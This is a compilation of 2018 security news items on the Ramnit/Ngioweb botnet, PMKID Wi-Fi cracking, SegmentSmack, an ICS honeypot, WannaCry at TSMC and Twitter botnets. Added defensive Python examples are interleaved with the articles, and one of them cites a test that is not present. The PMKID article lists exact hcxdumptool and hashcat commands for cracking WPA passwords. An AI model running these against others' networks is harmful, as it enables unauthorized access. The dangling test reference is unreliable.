“Recently we discovered the Ramnit C&C server ( which is not related to the previously most prevalent botnet “demetra”. According to domain names which are resolved to the IP address of this C&C server, it pretends to control even old bots, first seen back in 2015. We named this botnet “Black” due to the RC4 key value, “black”, that is used for traffic encryption in this botnet.” reads the analysis published by Checkpoint security.

“This C&C server has actually been active since 6th March 2018 but didn’t attract attention because of the low capacity of the “black” botnet at that time. However, in May-July 2018 we detected a new Ramnit campaign with around 100,000 computers infected.”
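The fixed RC4 key named above is directly useful to defenders: with a stream cipher and a constant key every bot produces the same keystream, so captured C&C traffic can be decrypted offline, and the constant keystream turns any known, constant message field into a byte-level network signature. The Python below is an added example, not Check Point's code and not Ramnit's own implementation; the check-in message is constructed (the real message format is not on the page), and it assumes the traffic carries no per-session IV or nonce, which the report does not state.

```python
"""RC4 decryption of Ramnit 'Black' C&C traffic with the reported fixed key.
Added analysis example (not Check Point's code); sample traffic is constructed."""
from typing import Iterator

BLACK_KEY = b"black"   # RC4 key named in the Check Point analysis


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Generate RC4 keystream bytes for `key` (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                                # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def decrypt_black_traffic(blob: bytes) -> bytes:
    """Decrypt a captured C&C payload (assumes no per-session IV; assumption)."""
    return rc4_crypt(BLACK_KEY, blob)


def keystream_prefix(key: bytes = BLACK_KEY, length: int = 16) -> bytes:
    """First keystream bytes: with a fixed key these never change, so the
    ciphertext of a constant plaintext prefix is the same for every bot."""
    ks = rc4_keystream(key)
    return bytes(next(ks) for _ in range(length))


def signature_for_prefix(plaintext_prefix: bytes) -> bytes:
    """Ciphertext bytes every bot would emit for a known constant plaintext prefix,
    usable as a network signature (constant plaintext prefix is an assumption)."""
    ks = keystream_prefix(BLACK_KEY, len(plaintext_prefix))
    return bytes(p ^ k for p, k in zip(plaintext_prefix, ks))


# Constructed bot check-in; the real Ramnit message format is not on the page.
CONSTRUCTED_PLAINTEXT = b"id=CONSTRUCTED-BOT-0001&cmd=ping"
CONSTRUCTED_CAPTURE = rc4_crypt(BLACK_KEY, CONSTRUCTED_PLAINTEXT)
```

The `"Key"`/`"Plaintext"` pair in the test is the standard RC4 test vector, which is the quickest way to confirm a hand-written RC4 before trusting it on real captures.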

According to the experts, in the Black operation the Ramnit malware is distributed via spam campaigns. The malicious code works as first-stage malware and is used to deliver a second-stage malware dubbed Ngioweb.

“Ngioweb represents a multifunctional proxy server which uses its own binary protocol with two layers of encryption,” continues the analysis published by Checkpoint.

“The proxy malware supports back-connect mode, relay mode, IPv4, IPv6 protocols, TCP and UDP transports, with first samples seen in the second half of 2017.”

Ngioweb relies on a two-stage C&C infrastructure: the STAGE-0 C&C server tells the malware which STAGE-1 C&C server to use, and an unencrypted HTTP connection is used for this purpose. The STAGE-1 C&C server then controls the malware over an encrypted connection.

The Ngioweb malware can operate in two main modes: regular back-connect proxy and relay proxy.

In relay proxy mode, the malware allows operators to build chains of proxies and hide their services behind the IP address of a bot.

“The following sequence of actions is used for building a hidden service using the Ngioweb botnet:

Ngioweb Bot-A connects to C&C STAGE-0 and receives command to connect to the server C&C STAGE-1 with address X:6666.
Ngioweb Bot-A connects to C&C STAGE-1 (Server-X) at X:6666. Server-X asks the bot to start the TCP server. Ngioweb bot reports on starting TCP server with IP address and port.
Malware actor publishes the address of the Bot-A in DNS (or using any other public channel).
Another malware Bot-B resolves the address of Bot-A using DNS (or using any other public channel).
Bot-B connects to Bot-A.
Bot-A creates a new connection to Server-X and works as a relay between Server-X and Bot-B.”

Further details, including the IoC, are reported in the analysis published by Checkpoint.

Hacking WiFi Password in a few steps using a new attack on WPA/WPA2
8.8.2018 securityaffairs   Hacking

A security researcher has devised a new WiFi hacking technique that could be exploited to easily crack WiFi passwords of most modern routers.
The security researcher Jens ‘Atom’ Steube, lead developer of the popular password-cracking tool Hashcat, has devised a new WiFi hacking technique that could be exploited to easily crack WiFi passwords of most modern routers.

The new WiFi hacking technique makes it possible to crack WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

The expert was analyzing the recently launched WPA3 security standard when he accidentally discovered the new technique.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).” Steube wrote in a post.

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.”

Older attack techniques required capturing a full 4-way handshake of Extensible Authentication Protocol over LAN (EAPOL), a network port authentication protocol. The new attack technique, unlike the previous ones, targets the Robust Secure Network Information Element (RSN IE).
The RSN protocol was designed for establishing secure communications over an 802.11 wireless network and is part of the 802.11i (WPA) standard. Whenever it attempts to establish a secure communication channel, RSN broadcasts an RSN IE message within the network.

The Robust Security Network protocol has the PMKID (Pairwise Master Key Identifier), that is the key needed to establish a connection between a client and an access point.

An attacker can obtain the WPA PSK (Pre-Shared Key) password from the PMKID.

The WPA PSK is used in the “Personal” version of WPA and is designed for home and small office networks.

“Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector,” Steube added.

“We receive all the data we need in the first EAPOL frame from the AP.”

The technique, step by step:

Step 1 — An attacker can use a tool like hcxdumptool (v4.2.0 or higher) to request the PMKID from the targeted access point and dump the received frame to a file.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Step 2 — Run the hcxpcaptool tool to convert the captured data from pcapng format to a hash format accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Use Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password that is the password of the target wireless network.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

The time needed to crack the password depends on its complexity.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” Steube concluded.

“The main advantages of this attack are as follow:

No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
No more waiting for a complete 4-way handshake between the regular user and the AP
No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
No more eventual invalid passwords sent by the regular user
No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”
If you are looking for a good step-by-step explanation, take a look at the blog post published by penetration tester Adam Toscher.

The new attack technique does not work against the recently introduced WPA3 security protocol.

The WPA3 protocol is “much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

'SegmentSmack' Flaw in Linux Kernel Allows Remote DoS Attacks
7.8.2018 securityweek  Attack

A vulnerability in the Linux kernel can allow a remote attacker to trigger a denial-of-service (DoS) condition by sending specially crafted packets to the targeted system. The flaw could impact many companies.

The security hole, classified as high severity, has been named SegmentSmack and is tracked as CVE-2018-5390. The issue was discovered by Juha-Matti Tilli of Aalto University and Nokia’s Bell Labs.

The vulnerability exists due to the way versions 4.9 and later of the Linux kernel handle specially crafted TCP packets. Linux kernel developers have released a patch that should address the problem.

“A remote attacker could use this flaw to trigger time and calculation expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions by sending specially modified packets within ongoing TCP sessions which could lead to a CPU saturation and hence a denial of service on the system,” Red Hat explained in an advisory for SegmentSmack. “Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port, thus the attacks cannot be performed using spoofed IP addresses.”

Red Hat says all its products with moderately new Linux kernel versions are affected. The company has not identified any workarounds or mitigations besides the kernel patches.

CERT/CC has also published an advisory for SegmentSmack. The organization believes the vulnerability could impact dozens of major vendors, including Amazon, Apple, BlackBerry, Cisco, Dell, Google, HP, IBM, Lenovo, Microsoft and several cybersecurity and networking solutions providers.

Amazon Web Services (AWS) says it has launched an investigation into the impact of the flaw on its products.

“AWS is aware of a recently-disclosed security issue, commonly referred to as SegmentSmack, which affects the TCP processing subsystem of several popular operating systems including Linux,” AWS said. “AWS services are operating normally. We will post a further update as soon as one is available.”

SUSE Linux has also released patches, but the organization says the vulnerability only affects SUSE Linux Enterprise 15.

New Method Discovered for Cracking WPA2 Wi-Fi Passwords
7.8.2018 securityweek  Hacking

Developers of the popular password cracking tool Hashcat have identified a new method that can in some cases be used to obtain a network’s Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2) password.

Jens ‘Atom’ Steube, the lead developer of Hashcat, revealed that the new attack method was discovered by accident during an analysis of the recently launched WPA3 security standard.

According to Steube, the main difference between the new and older attacks is that the new method does not require capturing a full 4-way handshake of Extensible Authentication Protocol over LAN (EAPOL), which is a network port authentication protocol. Instead, the attack targets the Robust Secure Network Information Element (RSN IE).

RSN is a protocol designed for establishing secure communications over an 802.11 wireless network and is part of the 802.11i (WPA) standard. When it begins to establish a secure communication channel, RSN broadcasts an RSN IE message across the network.

One of the capabilities of RSN is PMKID (Pairwise Master Key Identifier), from which an attacker can obtain the WPA PSK (Pre-Shared Key) password. WPA PSK is used in the “Personal” version of WPA and is designed for home and small office networks.

“Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector,” Steube explained in a post on the Hashcat forum. “We receive all the data we need in the first EAPOL frame from the AP.”

An attacker can use the hcxdumptool tool to request the PMKID from the targeted access point and dump the received frame to a file. Hcxdumptool can then be used to obtain a hash of the password that Hashcat can crack. The recommendation is that the tool be run for up to 10 minutes before aborting the process.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers),” Steube said.

Penetration tester Adam Toscher has published a blog post explaining step-by-step how such an attack can be conducted. The method has been tested by several individuals and while some claim to have successfully reproduced the attack, others say they haven’t been able to do so.

Some members of the industry pointed out that while this new method can make the attack easier to conduct, brute-forcing is still involved, which means a strong password represents an efficient mitigation. Experts also noted that WPA Enterprise (i.e. systems using WPA2-EAP) is not impacted.


As for WPA3, Steube noted that it’s “much harder to attack because of its modern key establishment protocol called ‘Simultaneous Authentication of Equals’ (SAE).”
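Both articles above describe the same observable: the attacker talks to the access point directly, receives the first EAPOL frame and never completes the handshake. That trace is visible on the AP side, so the Python below, added here as a defender-side example and not taken from the Hashcat post, hcxdumptool or hostapd, scans a constructed AP event log for clients toward which the AP repeatedly sent the first EAPOL frame (M1) without ever seeing the reply (M2). The log format, the event names, the thresholds and the sample stations are all assumptions made for the example.

```python
"""Heuristic for clients that repeatedly trigger half-open WPA2 handshakes on an AP.
Added defender-side example; the log format, event names and thresholds are
constructed assumptions, not hostapd or hcxdumptool output."""
from collections import defaultdict

INCOMPLETE_LIMIT = 3     # unanswered first frames per client before alerting
WINDOW_S = 600           # within this many seconds


def parse_ap_log(lines):
    """Constructed format: '<epoch> <client_mac> <event>' where event is one of
    ASSOC, EAPOL_M1_SENT, EAPOL_M2_RECV, DEAUTH."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, mac, event = line.split()
        events.append((int(ts), mac.lower(), event))
    return sorted(events)


def incomplete_handshakes(events):
    """Per client MAC, timestamps of handshakes where the AP sent the first EAPOL
    frame (M1) but never received the client's reply (M2)."""
    pending = {}                      # mac -> timestamp of the unanswered M1
    incomplete = defaultdict(list)
    for ts, mac, event in events:
        if event == "EAPOL_M1_SENT":
            if mac in pending:        # a new M1 while the old one is unanswered
                incomplete[mac].append(pending[mac])
            pending[mac] = ts
        elif event == "EAPOL_M2_RECV":
            pending.pop(mac, None)    # handshake progressed normally
        elif event in ("DEAUTH", "ASSOC") and mac in pending:
            incomplete[mac].append(pending.pop(mac))
    for mac, ts in pending.items():   # still unanswered when the log ends
        incomplete[mac].append(ts)
    return incomplete


def suspicious_clients(events, limit=INCOMPLETE_LIMIT, window_s=WINDOW_S):
    """Clients with at least `limit` incomplete handshakes inside one window."""
    flagged = {}
    for mac, stamps in incomplete_handshakes(events).items():
        stamps.sort()
        for i in range(len(stamps)):
            j = i
            while j + 1 < len(stamps) and stamps[j + 1] - stamps[i] <= window_s:
                j += 1
            if j - i + 1 >= limit:
                flagged[mac] = j - i + 1
                break
    return flagged


# Constructed log: one station completes a handshake and later drops out of
# range once; another station asks for the first frame five times and never replies.
SAMPLE_LOG = ["# epoch client_mac event",
              "50 11:22:33:44:55:66 ASSOC", "51 11:22:33:44:55:66 EAPOL_M1_SENT",
              "52 11:22:33:44:55:66 EAPOL_M2_RECV",
              "900 11:22:33:44:55:66 ASSOC", "901 11:22:33:44:55:66 EAPOL_M1_SENT",
              "905 11:22:33:44:55:66 DEAUTH"]
for n in range(5):
    base = 100 + 60 * n
    SAMPLE_LOG += [f"{base} AA:BB:CC:DD:EE:01 ASSOC",
                   f"{base + 1} AA:BB:CC:DD:EE:01 EAPOL_M1_SENT",
                   f"{base + 2} AA:BB:CC:DD:EE:01 DEAUTH"]


def analyse_sample():
    """Run the heuristic over the constructed log."""
    return suspicious_clients(parse_ap_log(SAMPLE_LOG))
```

A single unanswered M1 is normal (a station walking out of range), which is why the rule counts repeats inside a window rather than firing on the first one. The heuristic only raises visibility; the mitigations the articles name are a strong pre-shared key, since brute-forcing is still required, WPA2-Enterprise (WPA2-EAP), which is not affected, and WPA3's SAE key establishment.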

Honeypot Highlights Danger to ICS Systems From Criminal Hackers
7.8.2018 securityweek  ICS

A security firm established a sophisticated honeypot masquerading as a power transmission substation for a major electricity provider. The purpose was to attract attackers and analyze how they operate against the energy sector of the critical infrastructure.

Within two days of going live on June 17, the honeypot developed and operated by Cybereason was found, prepped by a black-market reseller, and sold on in the dark web underworld. xDedic RDP Patch was found in the environment. This is a tool developed by the owners of the xDedic underground forum that allows multiple simultaneous uses of the same RDP credentials. xDedic is a forum that focuses on selling RDP credentials. The initial attacker, notes the report, "also installed backdoors in the honeypot servers by creating additional users, another indicator that the asset was being prepared for sale on xDedic."

On June 27, eight days after the first incursion, a new criminal entity arrived. It was immediately clear, explains Cybereason in a report published today, that this attacker had just one purpose -- to pivot from the IT side of the 'substation' and gain access to the OT environment.

The honeypot had been designed to look like a typical substation: an IT side separated by a firewall from the OT side, comprising the industrial control systems separated from the pumps, monitors, breakers and other hardware elements of the energy provider.


It was immediately clear that these were attackers with skills beyond script kiddies. "The attackers appear to have been specifically targeting the ICS environment from the moment they got into the environment. They demonstrated non-commodity skills, techniques and a pre-built playbook for pivoting from an IT environment towards an OT environment," said Cybereason CISO Israel Barak.

The attackers showed no interest in anything but the ICS assets. But with access to the ICS devices on the IT side of the environment, the attackers were still denied immediate access to the target OT by the firewall. Blocked by the firewall, the attackers used multipoint network reconnaissance.

"The attackers," reports Cybereason, "moved from the remote server, to the SharePoint server, to the domain controller, to the SQL server to run network scans to determine if one of these assets would allow them to access the ICS environment. Instead of scanning the full network, attackers focused on scanning for assets that would give them access to the HMI and OT computers."

But this was not a nation-state attack. "I would place the attackers in the upper echelon of criminal hackers, just below the expertise of state operators," Ross Rustici, Cybereason's senior director for intelligence services told SecurityWeek. They made mistakes and were too noisy to be the best of the best -- for example, they disabled the security tools on one of the servers, which would present an immediate red flag to the security team.
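The hop-and-scan pattern Cybereason describes, an IT asset such as the SQL server running scans aimed only at hosts that might reach the HMI and OT computers, is exactly the kind of thing a combined SOC with flow visibility across both sides of the firewall can catch. The Python below is an added example, not Cybereason's code: it flags any source outside the OT range that contacts many distinct OT addresses inside a short window. The subnets, hosts, ports and flow records are constructed.

```python
"""Flag IT hosts sweeping the OT address space, the reconnaissance pattern
described above. Added example, not Cybereason's code; the subnets, hosts and
flow records are constructed."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

OT_NET = ip_network("10.20.0.0/16")   # constructed OT / ICS range
WINDOW_S = 300                        # sliding window, seconds
MIN_TARGETS = 8                       # distinct OT hosts before alerting


def parse_flows(lines):
    """Constructed record format: '<epoch> <src_ip> <dst_ip> <dst_port>'."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = line.split()
        flows.append((int(ts), src, dst, int(dport)))
    return sorted(flows)


def ot_sweep_sources(flows, ot_net=OT_NET, window_s=WINDOW_S, min_targets=MIN_TARGETS):
    """Map src -> largest number of distinct OT hosts contacted inside one window,
    for sources outside the OT range that reach min_targets."""
    per_src = defaultdict(list)
    for ts, src, dst, _ in flows:
        if ip_address(dst) in ot_net and ip_address(src) not in ot_net:
            per_src[src].append((ts, dst))
    alerts = {}
    for src, events in per_src.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window_s:
                start += 1
            best = max(best, len({d for _, d in events[start:end + 1]}))
        if best >= min_targets:
            alerts[src] = best
    return alerts


def sample_flow_lines():
    """Constructed traffic: an IT SQL server touching twelve OT hosts in one
    minute, an engineering workstation talking to a single HMI over hours,
    plus ordinary IT-to-IT and OT-to-OT traffic that must not alert."""
    lines = ["# epoch src dst dport"]
    lines += [f"{1000 + 5 * i} 10.10.0.40 10.20.0.{i + 1} 502" for i in range(12)]
    lines += [f"{2000 + 3600 * i} 10.10.0.77 10.20.0.5 3389" for i in range(3)]
    lines += ["1500 10.10.0.40 10.10.0.50 1433", "1600 10.20.0.5 10.20.0.9 502"]
    return lines


def detect_sample():
    """Run the detector over the constructed flows."""
    return ot_sweep_sources(parse_flows(sample_flow_lines()))
```

Counting distinct destinations rather than packets keeps a chatty but legitimate engineering workstation below the threshold while a targeted sweep of the OT range stands out even when, as in the honeypot, the attacker deliberately avoids scanning the full network.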

Cybereason had installed its own platform in the honeypot -- but intentionally in a manner that would make its removal simple. The attackers removed it. The Cybereason platform was re-installed with some hardening, but less than the level recommended by the firm. Again, the attackers were able to disable the hardened version. "After that incident," notes the report, "the platform was installed a third time based on our recommended guidelines and the attackers haven’t been able to deactivate it."

This gives us some insight into the attackers. They were not sufficiently competent to be stealthy, but were not afraid of being discovered. They persisted, even though they would have known that their presence had been detected. This argues against a state actor, who would firstly avoid detection, but then, if detected, most likely silently withdraw.

To be fair, Rustici wasn't expecting a state attacker. "Nation-state attacks against the critical infrastructure of an adversary state are effectively military operations; and military operations are planned with incredible detail," he said. "Such adversaries will be aware of all an energy provider's substations, and while we designed the honeypot sufficient to fool cybercriminals, it would not have withstood the standard reconnaissance and reconnoitering of a military operation."

What this tells us, however, is that the critical infrastructure is a target for standard criminals. The most obvious motivation would be extortion -- taking control of the substation and holding it to ransom. Detection would not be considered important if the endgame of extortion was still possible. But the motivation could also be just for the kudos or even CV-building.

ICS environments are often complex and use a diverse set of control system vendors. Without familiarity with the OT environment and its assets, it becomes more challenging for attackers to cause any significant disruption.

The danger is that criminal hackers are more clumsy than elite state actors. Current geopolitical tensions encourage nation states to explore the critical infrastructure of adversaries looking for an advantage in case of an escalation into actual warfare; but for the moment, that type of preparatory cyberwarfare is stealthy reconnaissance. State actors do not wish to be discovered.

These criminals were clumsy and not concerned with being discovered. This type of activity, warns Cybereason, "dramatically increases the risk of a mistake having real-world consequences... Hackers seeking to make a name for themselves or simply prove that they can get into a system are far more likely to cause failures out of ignorance rather than malice. This makes incident response and attribution harder, but it also is more likely to result in an unintended real-world effect."

The long-term danger to the critical infrastructure may come from nation-state attacks -- but the immediate danger is more likely to come from less competent cyber criminals. Cybereason recommends that companies with ICS environments should operate a unified SOC. "Companies may have a NOC monitoring the OT environment, but a combined SOC lets you see all operations as they move through the network. Having this visibility is important because attackers could start in the IT environment and move to the OT environment," said Barak.

Boston, MA-based threat-hunting firm Cybereason raised $100 million in Series D funding from SoftBank Corp in June 2017 -- bringing the total raised to $189 million. It was founded by Lior Div, Yonatan Amit and Yossi Naar in 2012. All three are veterans of Israel's elite IDF 8200 intelligence unit.

TSMC Chip Maker confirms its facilities were infected with WannaCry ransomware
7.8.2018 securityaffairs

TSMC shared further details on the attack and confirmed that its systems were infected with a variant of the infamous WannaCry ransomware.
Early in August, malware infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories, the plants where Apple produces its devices.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

Now the company shared further details on the attack and confirmed that its systems were infected with a variant of the infamous WannaCry ransomware that hit 200,000 computers across 150 countries in a matter of hours in May 2017.

WannaCry took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability in earlier versions of Microsoft Windows. This tool was stolen by a hacking group named “Shadow Brokers”, which leaked it to the world in April 2017.

The infection caused one of the most severe disruptions suffered by TSMC as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants shut down an entire day of production.

It has been estimated that the overall impact on TSMC's revenue will be approximately $256 million.

Chief Financial Officer Lora Ho confirmed that the infection would have some impact on TSMC’s 2018 profit, but declined to elaborate.


According to the manufacturer, it wasn’t a targeted attack, instead, the systems were infected “when a supplier installed tainted software without a virus scan” to TSMC’s network.

The malware rapidly spread within the company network and infected more than 10,000 machines in some of the company’s production plants, including Tainan, Hsinchu, and Taichung.

“We are surprised and shocked,” TSMC Chief Executive Officer C. C. Wei said, “We have installed tens of thousands of tools before, and this is the first time this happened.”

WannaCry infected many other big companies; the list of victims includes Boeing, Renault, and Honda.

TSMC confirmed that customer data was not compromised during the attack, but warned customers that shipment delays are expected.

Duo Security created open tools and techniques to identify large Twitter botnet
7.8.2018 securityaffairs BotNet

Researchers at security firm Duo Security have created a set of open source tools and disclosed techniques that could be used to identify large Twitter botnets.
Security experts from Duo Security have developed a collection of open source tools and disclosed techniques that can be useful in identifying large Twitter botnets.

The experts developed the tools starting from the analysis of 88 million Twitter accounts and over half-a-billion tweets, one of the largest random datasets of Twitter accounts analyzed to date.

“This paper details the techniques and tools we created to both build a large dataset containing millions of public Twitter profiles and content, as well as to analyze the dataset looking for automated accounts.” reads the research paper published by Duo Security.

“By applying a methodical data science approach to analyzing our dataset, we were able to build a classifier that effectively finds bots at a large scale.”

The dataset was built using the Twitter API; the collected records include profile name, tweet and follower counts, avatar, bio, the content of tweets, and social network connections.

Practical data science techniques can be used to create a classifier that could help researchers in finding automated Twitter accounts.

The experts defined 20 unique account heuristics to discover the bots, including the number of digits in a screen name, the entropy of the screen name, the followers/following ratio, the number of tweets and likes relative to the account’s age, the number of users mentioned in a tweet, the number of tweets with the same content, the percentage of tweets with URLs, the time between tweets, the average hours tweeted per day, and the average “distance” of account age in retweets/replies.

The above heuristics are organized into three categories: “Account attributes,” “Content,” and “Content Metadata.”
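To show what several of those heuristics look like as computable features, the Python below is an added example and not Duo Security's tooling or classifier: it derives digits-in-name, screen-name entropy, followers/following ratio, tweet rate relative to account age, share of tweets with URLs, share of duplicated content and the gap between tweets from an account record, then counts how many constructed thresholds an account trips. The thresholds, the one-point-per-rule scoring and the two sample accounts are all constructed for illustration; Duo built a real classifier from its dataset, which this rule count only stands in for.

```python
"""Bot-scoring features modelled on the Duo Security heuristics listed above.
Added example, not Duo's code: thresholds, rule weights and the two sample
accounts are constructed."""
import math
from collections import Counter
from datetime import datetime, timedelta, timezone

NOW = datetime(2018, 8, 7, tzinfo=timezone.utc)   # constructed "now"


def digit_count(screen_name: str) -> int:
    return sum(ch.isdigit() for ch in screen_name)


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking names score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def account_features(acct: dict, now: datetime = NOW) -> dict:
    """acct keys: screen_name, created_at, followers, following, tweet_count,
    tweets = list of (datetime, text)."""
    age_days = max((now - acct["created_at"]).total_seconds() / 86400, 1.0)
    texts = [t for _, t in acct["tweets"]]
    times = sorted(ts for ts, _ in acct["tweets"])
    gaps = sorted((b - a).total_seconds() for a, b in zip(times, times[1:]))
    dup = Counter(texts)
    return {
        "digits_in_name": digit_count(acct["screen_name"]),
        "name_entropy": shannon_entropy(acct["screen_name"]),
        "follow_ratio": acct["followers"] / max(acct["following"], 1),
        "tweets_per_day": acct["tweet_count"] / age_days,
        "url_fraction": sum("http" in t for t in texts) / max(len(texts), 1),
        "dup_fraction": sum(c for c in dup.values() if c > 1) / max(len(texts), 1),
        "median_gap_s": gaps[len(gaps) // 2] if gaps else float("inf"),
    }


# One point per triggered heuristic; thresholds are constructed, not Duo's.
RULES = {
    "digits_in_name": lambda v: v >= 4,
    "name_entropy": lambda v: v > 3.5,
    "follow_ratio": lambda v: v < 0.1,
    "tweets_per_day": lambda v: v > 100,
    "url_fraction": lambda v: v > 0.8,
    "dup_fraction": lambda v: v > 0.5,
    "median_gap_s": lambda v: v < 60,
}


def bot_score(acct: dict) -> int:
    feats = account_features(acct)
    return sum(1 for name, rule in RULES.items() if rule(feats[name]))


def is_likely_bot(acct: dict, threshold: int = 3) -> bool:
    return bot_score(acct) >= threshold


def _t(day: int, hour: int) -> datetime:
    return datetime(2018, 8, day, hour, tzinfo=timezone.utc)


# Constructed accounts: a giveaway-scam bot and an ordinary user.
SCAM_TEXT = "Send 0.1 BTC and get 1 BTC back! http://giveaway.invalid"
SAMPLE_ACCOUNTS = {
    "bot": {
        "screen_name": "elon_giveaway48213",
        "created_at": datetime(2018, 7, 1, tzinfo=timezone.utc),
        "followers": 12, "following": 2000, "tweet_count": 9000,
        "tweets": [(_t(6, 12) + timedelta(seconds=30 * i), SCAM_TEXT) for i in range(5)],
    },
    "human": {
        "screen_name": "alice_b",
        "created_at": datetime(2015, 3, 1, tzinfo=timezone.utc),
        "followers": 300, "following": 250, "tweet_count": 1200,
        "tweets": [(_t(1, 9), "coffee first"),
                   (_t(3, 18), "reading https://example.invalid/post"),
                   (_t(6, 12), "weekend plans?")],
    },
}


def score_samples() -> dict:
    """Score both constructed accounts."""
    return {name: bot_score(acct) for name, acct in SAMPLE_ACCOUNTS.items()}
```

The features map directly onto the paper's three categories: digits and entropy are account attributes, URL share and duplicated text are content, and tweet rate and inter-tweet gap are content metadata. Any single feature is noisy on its own, which is why both Duo's classifier and this stand-in combine several before calling an account automated.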

The tools and the techniques devised by the researchers could be very useful in investigating fraudulent activities associated with Twitter botnets. The experts first identify the automated bots, then they use the tools to monitor the evolution of the botnets they belong to.

The experts shared a case study related to the discovery of a sophisticated botnet of at least 15,000 bots involved in a cryptocurrency scam. The analysis of the botnet and the monitoring of the malicious infrastructure over time allowed the experts to discover how bots evolve to evade detection.

The experts reported their findings to Twitter, which confirmed that it is aware of the problem and is currently working on implementing new security measures to detect problematic accounts.


“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter’s rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections.” replied Twitter.

“When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter’s API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related.”

Duo Security will release its tools as open source on August 8 during the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” concluded Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”

How do file partner programs work?
7.8.2018 Kaspersky Analysis

It’s easy to notice if you’ve fallen victim to an advertising partner program: the system has new apps that you didn’t install, ad pages spontaneously open in the browser, ads appear on sites where they never used to, and so on. If you notice these symptoms on your computer, and in the list of installed utilities there is, for example, setupsk, Browser Enhancer, Zaxar game browser, “PC optimizers” (such as Smart Application Controller or One System Care), or unknown browsers, 99% of the time it’s a pay-per-install network. Every month, Kaspersky Lab security solutions prevent more than 500,000 attempts to install software that is distributed through advertising partner programs. Most such attempts (65%) happen in Russia.

Geography of attempts to install advertising partner programs apps, June 2018

The partner program acts as an intermediary between software vendors who wish to distribute their apps and owners of file hosting sites. When the user clicks the Download or similar button on such sites, the partner program provides a special installer that downloads the required file, but also determines which set of additional software should be installed on the PC.

File partner programs benefit everyone except the user. The site owner receives money for installing “partner” apps, and the partner program organizer collects a fee from the advertisers, who in turn get what they wanted, since their software is installed.

Propagation methods
To illustrate the process, we chose a scheme used by several partner programs. Let’s look at a real page offering to download a plugin for the S.T.A.L.K.E.R. game.

On attempting to download it, the user is redirected to a landing page selected by the administrator of the file-sharing site when loading the file onto the partner program server. Such pages often mimic the interface of popular cloud services:

Example of a fake page to which the user is redirected

This is what the landing page chooser looks like in the File-7 partner program settings

On clicking the download button, the user receives a file with one of the following formats:

Torrent file
ISO image
HTML document
Moreover, archives are often multi-layered and, in many cases, password-protected. Such protective measures and the choice of format are not accidental — partner programs use a wide range of tricks to prevent browsers from blocking the download of their installers.

Notification about installer download blocks in a partner program’s news feed

The victim is often guided through the loader installation with hints on the download pages as to how to find the program, which password to use for the archive, and how to run the installer. Some versions contain readme attachments with a description of the actions required for the installation. Regardless of the type of file that the user wanted to download, the end product is an executable. Interestingly, every time one and the same file is downloaded, its hash changes, and the file name always contains a set of apparently arbitrary characters.

Example of how loader files are named

Communicating with the server
At the preparatory stage, the partner program installer exchanges data with the C&C server. Every message transmitted uses encryption, usually rather primitive: first it is encoded in Base64, then the result is inverted, and again encoded in Base64.

